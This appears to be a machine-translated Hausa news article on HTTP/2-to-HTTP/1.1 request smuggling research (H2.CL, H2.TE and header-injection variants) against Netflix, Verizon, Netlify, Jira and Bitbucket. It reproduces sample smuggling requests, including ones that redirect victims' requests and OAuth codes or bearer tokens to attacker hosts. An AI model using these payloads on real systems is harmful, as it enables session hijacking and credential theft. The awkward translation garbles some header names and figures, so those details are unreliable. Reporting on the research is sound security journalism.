Tsarin gidan yanar gizo wanda gaba da gaba yana karɓar haɗi ta hanyar HTTP/2 kuma yana aikawa zuwa baya ta HTTP/1.1 an fallasa su zuwa sabon bambance-bambancen harin Smuggling na HTTP, wanda ke ba da izini, ta aika buƙatun abokin ciniki na musamman, don shiga cikin abun ciki. na buƙatun daga wasu masu amfani da aka sarrafa a cikin guda ɗaya tsakanin gaba da baya. Ana iya amfani da harin don saka lambar JavaScript mara kyau a cikin wani zama tare da halaltaccen rukunin yanar gizo, ketare tsarin sarrafa damar shiga, da kuma tsage sigogin tantancewa.
Matsalar tana shafar wakilai na yanar gizo, ma'aunin nauyi, masu haɓaka gidan yanar gizo, tsarin isar da abun ciki da sauran saiti waɗanda ake juyar da buƙatun bisa ga tsarin gaba-baya. Marubucin binciken ya nuna ikon kai hari kan tsarin akan Netflix, Verizon, Bitbucket, Netlify CDN da Atlassian, kuma sun karɓi $ 56 a cikin shirye-shiryen lamuni masu rauni. An kuma tabbatar da batun a samfuran hanyoyin sadarwa na F5. Wani ɓangare batun yana shafar mod_proxy a cikin uwar garken Apache http (CVE-2021-33193), ana tsammanin gyarawa a cikin sigar 2.4.49 (an sanar da masu haɓaka batun batun a farkon Mayu kuma sun karɓi watanni 3 don gyara shi). A cikin nginx, an toshe ikon tantance taken "Tsawon-Tsawon Abun ciki" da "Transfer-Encoding" a lokaci guda a cikin sakin karshe (1.21.1). An riga an ƙara kayan aikin kai hari zuwa kayan aikin Burp kuma ana samun su azaman ƙari na Turbo Intruder.
Ka'idar aiki na sabuwar hanyar buƙatun wedging a cikin zirga-zirga yana kama da raunin da mai binciken iri ɗaya ya gano shekaru biyu da suka gabata, amma yana iyakance ga gaba da ke karɓar buƙatun ta HTTP/1.1. Ka tuna cewa a cikin tsarin gaba-baya, ana karɓar buƙatun abokin ciniki ta ƙarin kumburi - frontend, wanda ke kafa haɗin TCP mai tsawo tare da bangon baya wanda ke aiwatar da buƙatun kai tsaye. Ta hanyar wannan haɗin na gama gari, buƙatun masu amfani daban-daban galibi ana watsa su, waɗanda ke bin sarkar ɗaya bayan ɗaya, ta hanyar ka'idar HTTP.
Harin na ''HTTP Request Smuggling'' na al'ada ya dogara ne akan gaskiyar cewa gaba da baya suna fassara amfani da taken HTTP "Tsawon Tsawon Ciki" (yana ƙayyade adadin bayanan da ke cikin buƙatar) da "Transfer-Encoding: chunked" ( yana ba da damar canja wurin bayanai a sassa) daban. Misali, idan gaban gaba kawai yana goyan bayan "Length Content-Length" amma yayi watsi da "Transfer-Encoding: chunked", to mai hari zai iya aika buƙatun da duka biyun sun ƙunshi "Length Content-Length" da "Transfer-Encoding: chunked", amma girman shine "Length Content" bai dace da girman sarkar da aka yanke ba. A wannan yanayin, gaban gaba zai aiwatar da tura buƙatun bisa ga "Length Content", kuma ƙarshen baya zai jira toshe don kammala bisa "Transfer-Encoding: chunked" kuma ragowar wutsiya na buƙatar maharin zai kasance. a farkon buƙatun ƙasashen waje da aka watsa na gaba.
Ba kamar ka'idar HTTP/1.1 na tushen rubutu ba, wacce aka karkata a matakin layi, HTTP/2 yarjejeniya ce ta binary kuma tana sarrafa tubalan bayanai na girman da aka ƙayyade. Koyaya, HTTP/2 yana amfani da kanun labarai na bogi waɗanda suka dace da taken HTTP na yau da kullun. Lokacin yin hulɗa tare da baya ta hanyar HTTP / 1.1, gaban gaba yana fassara waɗannan masu rubutun kan layi zuwa cikin irin HTTP / 1.1 HTTP. Matsalar ita ce mai baya yana yanke shawara game da tantance rafi bisa tushen HTTP da aka saita ta gaba, ba tare da sanin ma'auni na ainihin buƙatun ba.
Ciki har da nau'in rubutun kai, ƙimar "tsawon abun ciki" da "canja wurin-encoding" ana iya watsa shi, duk da cewa ba a amfani da su a cikin HTTP / 2, tunda girman duk bayanan an ƙaddara a cikin filin daban. Koyaya, a cikin aiwatar da canza buƙatun HTTP/2 zuwa HTTP/1.1, ana ɗaukar waɗannan kanun labarai kuma suna iya rikitar da ƙarshen baya. Akwai manyan zaɓuɓɓukan hari guda biyu: H2.TE da H2.CL, wanda aka ɓatar da bayan baya ta hanyar canja wurin da ba daidai ba ko ƙimar tsawon abun ciki wanda bai dace da ainihin girman jikin buƙatun da aka samu ta gaba ta hanyar HTTP/2 protocol.
A matsayin misali na harin H2.CL, babban abun ciki-tsawon kai ba daidai ba ne lokacin aika buƙatun HTTP/2 zuwa Netflix. Wannan buƙatun yana haifar da ƙari mai kama da taken HTTP Mai Tsawon Abun ciki lokacin samun dama ga bangon baya ta HTTP/1.1, amma tunda girman da ke cikin Tsawon Abun ciki bai kai ainihin girman ba, ana sarrafa wasu bayanan da ke cikin wutsiya azaman farkon bukata ta gaba.
Misali, buqatar HTTP/2: Hanyar POST: hanya / n: izini www.netflix.com abun ciki-tsawon 4 abcdGET /n HTTP/1.1 Mai watsa shiri: 02.rs?x.netflix.com Foo: bar
Za a aika buƙatu zuwa ga baya: POST /n HTTP/1.1 Mai watsa shiri: www.netflix.com Tsawon Abun ciki: 4 abcdGET /n HTTP/1.1 Mai watsa shiri: 02.rs?x.netflix.com Foo: bar
Tun lokacin da aka saita Tsawon Abun ciki zuwa 4, ƙarshen baya zai karɓi “abcd” kawai azaman ƙungiyar buƙatar, kuma ta aiwatar da sauran “GET / n HTTP/1.1…” azaman farkon buƙatun na gaba wanda ke ɗaure ga wani mai amfani. Saboda haka, rafin zai daina aiki tare, kuma don amsa buƙatu na gaba, za a dawo da sakamakon sarrafa buƙatun na jabu. A cikin yanayin Netflix, ƙayyadaddun mai watsa shiri na ɓangare na uku a cikin "Mai watsa shiri:" a cikin buƙatun buƙatun ya haifar da amsa "Location: https://02.rs?x.netflix.com/n" ga abokin ciniki kuma an ba da izinin abun ciki na sabani ga abokin ciniki, gami da aiwatar da lambar JavaScript ɗin ku a cikin mahallin rukunin yanar gizon Netflix.
Bambanci na biyu na harin (H2.TE) yana da alaƙa da maye gurbin "Transfer-Encoding: chunked" header. An hana yin amfani da maɓallin ɓoye-ɓoye a cikin HTTP/2 ta ƙayyadaddun bayanai kuma an ba da umarnin buƙatun tare da shi don a bi da su azaman kuskure. Duk da wannan, wasu aiwatar da gaba-gaba sun yi watsi da wannan buƙatu kuma suna ba da damar yin amfani da maɓallin canza sheƙa a cikin HTTP/2, wanda ke fassara zuwa mai kama da HTTP. Idan taken "Transfer-Encoding" yana nan, mai ba da baya zai iya ɗaukar shi a matsayin fifiko kuma ya rarraba bayanai a cikin sassan cikin yanayin "chunked" ta amfani da tubalan masu girma dabam dabam a cikin tsarin "{size}\r\n{block} \r\n{size} \r\n{block}\r\n0" duk da rarrabuwar farko da girman gaba ɗaya.
An nuna kasancewar irin wannan rata ta misalin Verizon. Koyaya, matsalar ta shafi hanyar tantancewa da tsarin sarrafa abun ciki, wanda kuma shafuka kamar Huffington Post da Engadget ke amfani dashi. Misali, buƙatun abokin ciniki akan HTTP/2:: Hanyar POST: hanya /identitfy/XUI: ikon id.b2b.oath.com canja wurin-encoding 0 GET /oops HTTP/1.1 Mai watsa shiri: psres.net Tsawon Abun ciki: 10 x=
Ya haifar da buƙatar HTTP/1.1 don mayar da baya: POST /identity/XUI HTTP/1.1 Mai watsa shiri: id.b2b.oath.com Tsawon Tsawon Ciki: 66 Canja wurin-Tsarin: chunked 0 GET /oops HTTP/1.1 Mai watsa shiri: psres.net Content-Length ku: 10x=
Ƙarshen baya, bi da bi, ya yi watsi da taken "Length-Content-Length" kuma yayi rarrabuwar rafi bisa "Transfer-Encoding: chunked". A aikace, harin ya ba da damar tura buƙatun mai amfani zuwa rukunin yanar gizon ku, gami da satar buƙatun masu alaƙa da amincin OAuth, waɗanda sigogin su suka bayyana a cikin taken Mai Magana, da kuma daidaita zaman tantancewa da ƙaddamar da aika takaddun shaidar mai amfani zuwa ga mai kai hari. SAMU /b2blanding/show/oops HTTP/1.1 Mai watsa shiri: psres.net Referer: https://id.b2b.oath.com/?…&code=asirin SAMU / HTTP/1.1 Mai watsa shiri: psres.net Izinin: Mai ɗaukar eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…
Don kai hari kan aiwatar da HTTP/2 waɗanda ba su ba da izinin ƙayyadaddun madaidaicin bayanan canza sheka ba, an ba da shawarar wata hanyar da ta haɗa da maye gurbin taken "Transfer-Encoding" ta hanyar haɗa shi zuwa wasu masu rubutun kan layi waɗanda ke raba ta sabon layi (lokacin da aka canza). zuwa HTTP/1.1 a wannan yanayin, an ƙirƙiri wasu masu rubutun HTTP guda biyu).
Misali, Atlassian Jira da Netlify CDN (an yi amfani da su don hidimar shafin farko na Mozilla a Firefox) wannan matsalar ta shafa. Musamman, buƙatar HTTP/2: Hanyar POST: hanya / : izini start.mozilla.org foo b\r \n canja wurin-encoding: chunked 0 \ r \ r \ n GET / HTTP / 1.1 \ r \ n Mai watsa shiri : evil-netlify-domain\r\n Tsawon Abun ciki: 5\r\n \r\nx=
ya haifar da buƙatun HTTP/1.1 POST / HTTP/1.1 da za a aika zuwa ga baya\r\n Mai watsa shiri: start.mozilla.org\r Foo: b\r \n Canja wurin-Tsarin: chunked\r\n Content- Length: 71\r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Mai watsa shiri: mugunta-netlify-domain\r\n Tsawon abun ciki: 5\r\n r\nx=
Wani zaɓi don musanya taken "Transfer-Encoding" shine a haɗa shi zuwa sunan wani rubutun kan layi ko zuwa kirtani tare da hanyar buƙata. Misali, lokacin shiga Atlassian Jira, sunan mai rubutun kan layi "foo: bar\r\ntransfer-encoding" tare da ƙimar "chunked" ya haifar da ƙari na masu rubutun HTTP "foo: bar" da "canjawa-encoding". : chunked", da ƙididdigewa a cikin pseudo-header ": Hanyar" na ƙimar "GET / HTTP/1.1 \ r \n Canja wurin-encoding: chunked" zuwa "GET / HTTP / 1.1 \ r \ntransfer-encoding: chunked" .
Mai binciken wanda ya gano matsalar kuma ya ba da shawarar dabarar tunnel ɗin buƙatun don kai hari a gaban gaba, inda aka kafa keɓancewar haɗin kai ga kowane adireshin IP kuma zirga-zirgar masu amfani daban-daban ba ta haɗu ba. Dabarar da aka tsara ba ta ƙyale ku ku shiga cikin buƙatun sauran masu amfani ba, amma yana ba ku damar yin guba ga cache ɗin da aka raba, wanda ke shafar sarrafa sauran buƙatun, kuma yana ba ku damar canza madaidaitan HTTP na ciki waɗanda aka yi amfani da su don canja wurin bayanan sabis daga gaban gaba zuwa baya (misali, lokacin tantancewa a gefen gaba a cikin irin waɗannan masu buga kai na iya aika bayanai game da mai amfani na yanzu zuwa ga baya). A matsayin misali na yin amfani da hanyar a aikace, ta amfani da cache guba, yana yiwuwa a sami iko akan shafukan da ke cikin sabis na Bitbucket.
source: budenet.ru